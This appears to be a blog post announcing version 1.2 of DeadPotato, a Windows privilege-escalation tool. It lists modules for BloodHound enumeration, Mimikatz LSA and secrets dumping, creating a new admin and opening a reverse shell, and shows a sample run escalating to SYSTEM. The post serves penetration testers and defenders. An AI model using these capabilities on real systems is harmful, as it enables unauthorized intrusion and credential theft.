Cyber security

DeadPotato – Harnessing Advanced System Tools For Security And Administration

The latest iteration of the versatile security tool designed for network administrators and cybersecurity professionals.

This version adds new capabilities like domain data collection for BloodHound and enhanced compatibility with Windows 10.

Learn how to leverage DeadPotato’s suite of modules for system assessment and security exploitation.

This version includes the following changes:

  • sharphound: Attempts to collect domain data for BloodHound. (NOTE: This will write SharpHound to disk!)
  • mimi <sam/lsa/secrets>: Added LSA & Secrets dump with Mimikatz.
  • Added banner compatibility for win10.

Usage of this program in an unauthorized context is strictly forbidden. The author(s) take no responsibility over the misuse of this DeadPotato or any of it’s components.

Choose among many modules! (-cmd, -newadmin, -rev, -exe, ...).
Here is an example with the -sharphound module!

C:\Users\lypd0> DeadPotato.exe -sharphound
   .-'      '-.          _           _ 
  /            \        | \ _  _  _||_) _ _|_ _ _|_ _ 
 '          _.  '       |_/(/_(_|(_||  (_) |_(_| |_(_)
 \      """" /  ~(      Open Source @
  '=,,_ =\__ `  &             -= Version: 1.2 =-
        ""  ""'; \\\ 


(*) Attempting to write XaOAZsTO.exe (SharpHound) in the current directory...
(+) File written. Attempting to run enumeration...

(*) Initiating procedure as NT AUTHORITY\NETWORK SERVICE
(+) Is impersonation possible in current context? YES
(+) Currently running as user: NT AUTHORITY\SYSTEM
(+) Elevated process started with PID 3640

-={          OUTPUT BELOW         }=-

2024-08-04T08:08:05.4023630-07:00|INFORMATION|SharpHound Enumeration Completed at 8:08 AM on 8/4/2024! Happy Graphing!

(+) Removing SharpHound and exiting.
BinaryMD5 Checksum
mimikatz.exe (embedded)E930B05EFE23891D19BC354A4209BE3E

For more information click here.

Tamil S

Tamil has a great interest in the fields of Cyber Security, OSINT, and CTF projects. Currently, he is deeply involved in researching and publishing various security tools with Kali Linux Tutorials, which is quite fascinating.

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